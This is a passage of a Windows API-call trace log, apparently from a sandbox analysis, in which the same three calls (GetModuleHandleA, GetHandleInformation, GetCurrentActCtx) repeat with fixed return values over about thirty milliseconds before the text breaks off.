[0019.476] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.476] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.476] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.476] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.476] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.476] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.476] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.476] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.476] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.476] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.476] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.477] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.477] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.477] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.477] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.477] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.477] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.477] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.477] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.477] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.477] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.477] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.478] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.478] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.478] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.478] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.478] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.478] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.478] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.478] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.478] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.478] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.479] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.479] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.479] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.479] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.479] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.479] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.479] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.479] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.479] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.479] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.479] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.479] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.482] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.482] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.482] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.482] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.482] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.483] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.483] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.483] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.483] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.483] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.483] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.483] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.483] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.483] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.483] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.484] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.484] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.484] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.484] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.484] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.484] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.484] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.484] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.484] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.484] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.484] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.485] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.485] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.485] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.485] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.485] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.485] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.485] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.485] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.485] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.485] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.486] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.486] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.486] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.486] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.486] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.486] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.486] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.486] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.486] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.486] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.486] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.486] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.487] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.487] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.487] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.487] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.487] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.487] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.487] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.487] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.487] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.487] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.487] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.488] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.488] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.488] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.488] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.488] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.488] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.488] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.488] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.488] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.488] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.489] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.489] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.489] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.489] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.489] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.489] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.489] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.489] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.489] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.489] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.489] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.489] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.490] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.490] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.490] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.490] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.490] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.490] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.490] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.490] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.490] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.490] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.490] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.491] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.491] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.491] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.491] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.491] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.491] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.491] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.491] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.491] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.491] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.492] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.492] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.492] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.492] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.492] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.492] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.492] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.492] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.492] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.493] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.493] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.493] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.493] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.493] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.493] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.493] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.493] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.493] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.493] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.493] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.493] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.494] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.494] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.494] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.494] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.494] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.494] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.494] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.494] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.494] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.494] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.494] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.495] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.495] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.495] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.495] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.495] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.495] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.495] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.495] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.495] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.495] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.496] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.496] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.496] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.496] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.496] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.496] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.497] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.497] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.497] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.497] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.497] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.497] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.497] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.497] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.497] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.497] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.497] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.497] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.498] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.498] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.498] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.498] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.498] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.498] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.498] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.498] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.498] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.498] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.498] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.498] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.499] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.499] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.499] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.499] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.499] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.499] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.499] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.499] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.499] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.499] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.500] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.500] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.500] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.500] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.500] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.500] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.500] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.500] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.500] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.500] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.500] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.501] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.501] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.501] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.501] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.501] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.501] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.501] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.501] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.501] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.501] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.501] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.501] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.502] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.502] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.502] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.502] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.502] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.502] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.502] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.502] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.502] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.502] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.502] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.502] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.503] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.503] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.503] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.503] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.503] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.503] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.503] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.503] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.503] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.503] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.504] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.504] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.504] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.504] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.504] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.504] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.504] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.504] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.504] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.504] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.504] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.505] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.505] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.505] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.505] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.505] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.505] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.505] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.505] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.505] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.506] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.506] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.506] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.506] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.506] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.506] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.506] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.506] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.506] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.506] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.506] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.506] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.507] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.507] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.507] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.507] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.507] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.507] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.507] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.507] GetHandleInformation (in: 